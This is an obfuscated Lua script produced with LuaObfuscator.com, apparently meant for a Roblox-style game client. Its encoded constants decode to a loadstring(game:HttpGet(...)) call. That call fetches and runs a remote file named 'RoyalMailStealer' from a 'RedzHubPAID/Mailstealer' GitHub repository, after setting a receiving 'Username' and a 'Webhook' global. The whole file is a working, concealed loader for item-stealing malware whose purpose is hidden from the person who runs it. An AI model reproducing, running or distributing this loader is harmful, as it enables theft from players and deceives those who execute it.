--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-((1639 -(1523 + 114)) -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v84-(v84%(932 -((1734 -(282 + 595)) + 74))) ;else local v85=(570 -(367 + (286 -85)))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + (1065 -(68 + 997)))) or (0 + (1270 -(226 + 1044))) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (120 -(32 + 63 + 22)) );v19=v19 + 4 + 0 ;v34=1 + 0 ;end if (v34==(351 -(87 + 263))) then return (v38 * (16777396 -(67 + 113))) + (v37 * (48056 + 17480)) + (v36 * (1213 -((3545 -2653) + 65))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(2 -0)) then else local v90=0 -0 ;local v91;while true do if (v90==(1636 -(1373 + 263))) then v91=0;while true do if ((1001 -(451 + 549))~=v91) then else v39=1 + 2 ;break;end if (v91~=(0 -0)) then else local v103=0 -0 ;while true do if (v103==(1385 -(746 + 638))) then v91=1 + 0 ;break;end if (v103~=(0 -0)) then else v44=nil;v45=nil;v103=1;end end end end break;end end end if (v39~=1) then else local v92=0;while true do if (v92==(342 -(218 + 123))) then v39=1583 -(1535 + 46) ;break;end if ((0 + 0)~=v92) then else v42=nil;v43=nil;v92=1 + 0 ;end end end if (0==v39) then local v93=560 -(306 + 254) ;while true do if (v93==(1 + 0)) then v39=1;break;end if (0~=v93) then else v40=0 -0 ;v41=nil;v93=1468 -(899 + 568) ;end end end if (v39~=(2 + 1)) then else v46=nil;while true do local v94=0;while true do if ((2 -1)~=v94) then else if (v40~=2) then else local v104=0;local v105;while true do if (v104~=0) then else v105=0;while true do if ((604 -(268 + 335))~=v105) then else for v152=291 -(60 + 230) ,v24() do local v153=572 -(426 + 146) ;local v154;local v155;while true do if (v153==1) then while true do if (v154==0) then v155=v22();if (v21(v155,1,1)~=0) then else local v183=0;local v184;local v185;local v186;local v187;local v188;while true do if (v183~=2) then else v188=nil;while true do if (v184~=2) then else while true do if (v185==(1 + 0)) then local v199=1456 -(282 + 1174) ;local v200;while true do if (v199==0) then v200=0;while true do if (v200~=0) then else local v213=0;while true do if (v213==1) then v200=812 -(569 + 242) ;break;end if (v213~=(0 -0)) then else v188={v23(),v23(),nil,nil};if (v186==(1251 -(721 + 530))) then local v216=0;local v217;while true do if (v216~=0) then else v217=1271 -(945 + 326) ;while true do if (v217==0) then v188[7 -4 ]=v23();v188[4]=v23();break;end end break;end end elseif (v186==(1 + 0)) then v188[703 -(271 + 429) ]=v24();elseif (v186==2) then v188[3 + 0 ]=v24() -((1502 -(1408 + 92))^16) ;elseif (v186~=3) then else local v222=1086 -(461 + 625) ;local v223;while true do if (v222~=(1288 -(993 + 295))) then else v223=0 + 0 ;while true do if (v223~=(1171 -(418 + 753))) then else v188[3]=v24() -(2^16) ;v188[2 + 2 ]=v23();break;end end break;end end end v213=1;end end end if (v200~=(1 + 0)) then else v185=2;break;end end break;end end end if (v185~=(1 + 1)) then else local v201=0 + 0 ;while true do if (v201~=(530 -(406 + 123))) then else v185=3;break;end if (v201~=0) then else if (v21(v187,1770 -(1749 + 20) ,1 + 0 )~=1) then else v188[1324 -(1249 + 73) ]=v46[v188[2]];end if (v21(v187,2,2)==1) then v188[3]=v46[v188[3]];end v201=1;end end end if (v185~=3) then else if (v21(v187,2 + 1 ,1148 -(466 + 679) )~=(2 -1)) then else v188[4]=v46[v188[11 -7 ]];end v41[v152]=v188;break;end if (v185==0) then local v203=0;local v204;while true do if (v203==0) then v204=0;while true do if (v204~=(1901 -(106 + 1794))) then else v185=1 + 0 ;break;end if (v204==0) then local v214=0 + 0 ;while true do if (0==v214) then v186=v21(v155,2,8 -5 );v187=v21(v155,4,16 -10 );v214=115 -(4 + 110) ;end if (v214~=(585 -(57 + 527))) then else v204=1;break;end end end end break;end end end end break;end if ((1428 -(41 + 1386))~=v184) then else v187=nil;v188=nil;v184=2;end if (v184==0) then local v197=103 -(17 + 86) ;while true do if (v197~=(1 + 0)) then else v184=1;break;end if (v197==(0 -0)) then v185=0 -0 ;v186=nil;v197=1;end end end end break;end if (v183~=0) then else v184=0;v185=nil;v183=1;end if (v183==1) then v186=nil;v187=nil;v183=2;end end end break;end end break;end if (v153~=(166 -(122 + 44))) then else local v176=0;while true do if (v176~=(1 -0)) then else v153=3 -2 ;break;end if (v176~=0) then else v154=0;v155=nil;v176=1 + 0 ;end end end end end v40=3;break;end if (v105~=0) then else local v137=0 + 0 ;local v138;while true do if (v137==(0 -0)) then v138=65 -(30 + 35) ;while true do if ((0 + 0)==v138) then local v179=0;while true do if (v179==0) then for v190=1258 -(1043 + 214) ,v45 do local v191=0 -0 ;local v192;local v193;local v194;local v195;local v196;while true do if ((1213 -(323 + 889))==v191) then v194=nil;v195=nil;v191=2;end if (0~=v191) then else v192=0 -0 ;v193=nil;v191=1;end if (v191~=2) then else v196=nil;while true do if (v192==(581 -(361 + 219))) then v195=nil;v196=nil;v192=2;end if (v192~=0) then else local v198=0;while true do if (v198~=(321 -(53 + 267))) then else v192=1 + 0 ;break;end if (v198==0) then v193=413 -(15 + 398) ;v194=nil;v198=983 -(18 + 964) ;end end end if (v192~=2) then else while true do if (v193==0) then v194=0;v195=nil;v193=1;end if (v193~=(3 -2)) then else v196=nil;while true do if (v194~=(1 + 0)) then else if (v195==(1 + 0)) then v196=v22()~=0 ;elseif (v195==(852 -(20 + 830))) then v196=v25();elseif (v195~=3) then else v196=v26();end v46[v190]=v196;break;end if (v194~=(0 + 0)) then else local v208=126 -(116 + 10) ;while true do if (v208==(1 + 0)) then v194=1;break;end if (v208==(738 -(542 + 196))) then local v215=0 -0 ;while true do if (1==v215) then v208=1;break;end if (v215~=(0 + 0)) then else v195=v22();v196=nil;v215=1 + 0 ;end end end end end end break;end end break;end end break;end end end v44[2 + 1 ]=v22();v179=1;end if (v179~=(2 -1)) then else v138=2 -1 ;break;end end end if (v138==(1552 -(1126 + 425))) then v105=1;break;end end break;end end end end break;end end end if (v40~=1) then else local v106=405 -(118 + 287) ;local v107;local v108;while true do if (1==v106) then while true do if ((0 -0)==v107) then v108=1121 -(118 + 1003) ;while true do if (v108~=(2 -1)) then else v46={};v40=379 -(142 + 235) ;break;end if (v108~=(0 -0)) then else local v171=0;local v172;while true do if (v171~=0) then else v172=0 + 0 ;while true do if (v172==1) then v108=1;break;end if (v172==0) then v44={v41,v42,nil,v43};v45=v24();v172=1;end end break;end end end end break;end end break;end if (v106==0) then v107=0 + 0 ;v108=nil;v106=1;end end end break;end if (v94~=(0 + 0)) then else local v101=0 + 0 ;while true do if (v101==0) then if (v40==0) then local v109=0 + 0 ;local v110;local v111;while true do if (v109==(0 + 0)) then v110=0;v111=nil;v109=2 -1 ;end if (v109==(2 -1)) then while true do if (v110~=0) then else v111=0 -0 ;while true do if (1==v111) then v43={};v40=1;break;end if (v111==0) then local v180=0;while true do if (v180~=1) then else v111=1 + 0 ;break;end if (v180~=(0 -0)) then else v41={};v42={};v180=754 -(239 + 514) ;end end end end break;end end break;end end end if (v40~=3) then else local v112=0 + 0 ;local v113;while true do if (v112~=(1329 -(797 + 532))) then else v113=0 + 0 ;while true do if (v113==0) then local v173=0;while true do if (v173==(0 + 0)) then for v181=2 -1 ,v24() do v42[v181-(1203 -(373 + 829)) ]=v29();end return v44;end end end end break;end end end v101=732 -(476 + 255) ;end if (v101==1) then v94=1;break;end end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=1130 -(369 + 761) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1 + 0)) then v50=1 -0 ;v51=(v21(v49,1 -0 ,258 -(64 + 174) ) * ((1 + 1)^(47 -15))) + v48 ;v47=338 -(144 + 192) ;end if (v47==((694 -(41 + 435)) -((1043 -(938 + 63)) + 174))) then v52=v21(v49,16 + 5 ,26 + 5 );v53=((v21(v49,14 + 18 )==(1505 -(363 + 1141))) and  -(1 + 0)) or (1581 -(1183 + 397)) ;v47=8 -5 ;end if ((0 + 0)==v47) then v48=v24();v49=v24();v47=1 + 0 ;end if (v47==(1978 -(1913 + (1187 -(936 + 189))))) then if (v52==(0 + 0)) then if (v51==(0 -0)) then return v53 * (1933 -(186 + 379 + 1368)) ;else v52=3 -2 ;v50=1661 -((3090 -(1565 + 48)) + 114 + 70) ;end elseif (v52==(2789 -742)) then return ((v51==(0 + 0)) and (v53 * ((857 -(564 + 292))/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(3083 -2060) ) * (v50 + (v51/((306 -(244 + 60))^(40 + 12)))) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(267 -(176 + 91))) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1139 -(782 + 356)) );v19=v19 + v54 ;local v56={};for v68=1, #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0;local v58;while true do if (v57==(1 -0)) then return v58;end if (v57==(1092 -(792 + 183 + 117))) then v58=v1(v16,v19,v19);v19=v19 + (3 -2) ;v57=1876 -(157 + 1718) ;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (6 -4) );v19=v19 + (1020 -(697 + 321)) ;return (v60 * (697 -441)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v61,16));if v20 then local v102=v5(v87,v20);v20=nil;return v102;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==1) then if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83==0) then v74=v82[3];else local v115=v82[2];local v116=v80[v82[3]];v80[v115 + 1 ]=v116;v80[v115]=v116[v82[4]];end elseif (v83<=2) then v64[v82[3]]=v80[v82[2]];elseif (v83==3) then local v139=v82[2];local v140,v141=v73(v80[v139](v13(v80,v139 + 1 ,v82[3])));v75=(v141 + v139) -1 ;local v142=0;for v156=v139,v75 do local v157=0;while true do if (v157==0) then v142=v142 + 1 ;v80[v156]=v140[v142];break;end end end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=7) then if (v83<=5) then v80[v82[2]]=v82[3];elseif (v83>6) then v80[v82[2]]();elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83<=8) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83==9) then local v146=0;local v147;while true do if (v146==0) then v147=v82[2];v80[v147]=v80[v147](v13(v80,v147 + 1 ,v75));break;end end else v64[v82[3]]=v80[v82[2]];end elseif (v83<=15) then if (v83<=12) then if (v83==11) then local v124=v82[2];v80[v124]=v80[v124](v13(v80,v124 + 1 ,v75));else v74=v82[3];end elseif (v83<=13) then do return;end elseif (v83==14) then for v158=v82[2],v82[3] do v80[v158]=nil;end else v80[v82[2]]();end elseif (v83<=18) then if (v83<=16) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==2) then for v167=v128,v75 do v131=v131 + 1 ;v80[v167]=v129[v131];end break;end if (v127==1) then v75=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==0) then v128=v82[2];v129,v130=v73(v80[v128](v13(v80,v128 + 1 ,v82[3])));v127=1;end end elseif (v83==17) then for v161=v82[2],v82[3] do v80[v161]=nil;end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=19) then local v132=v82[2];local v133=v80[v82[3]];v80[v132 + 1 ]=v133;v80[v132]=v133[v82[4]];elseif (v83>20) then v80[v82[2]]=v82[3];else do return;end end v74=v74 + 1 ;break;end if (v89==0) then v82=v70[v74];v83=v82[1];v89=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5265647A487562504149442F4D61696C737465616C65722F6D61696E2F526F79616C4D61696C537465616C657203083O00557365726E616D6503143O00477572614D6174517579656E4B69656D536F617403073O00576562682O6F6B035O00223O0012053O00014O0011000100013O0026043O00020001000100044O00020001001205000100013O0026040001000F0001000200044O000F0001001206000200033O001206000300043O002013000300030005001205000500064O0003000300054O000B00023O00022O000700020001000100044O00210001002604000100050001000100044O00050001001205000200013O002604000200160001000200044O00160001001205000100023O00044O00050001002604000200120001000100044O00120001001205000300083O00120A000300073O0012050003000A3O00120A000300093O001205000200023O00044O0012000100044O0005000100044O0021000100044O000200012O000D3O00017O00",v9(),...);
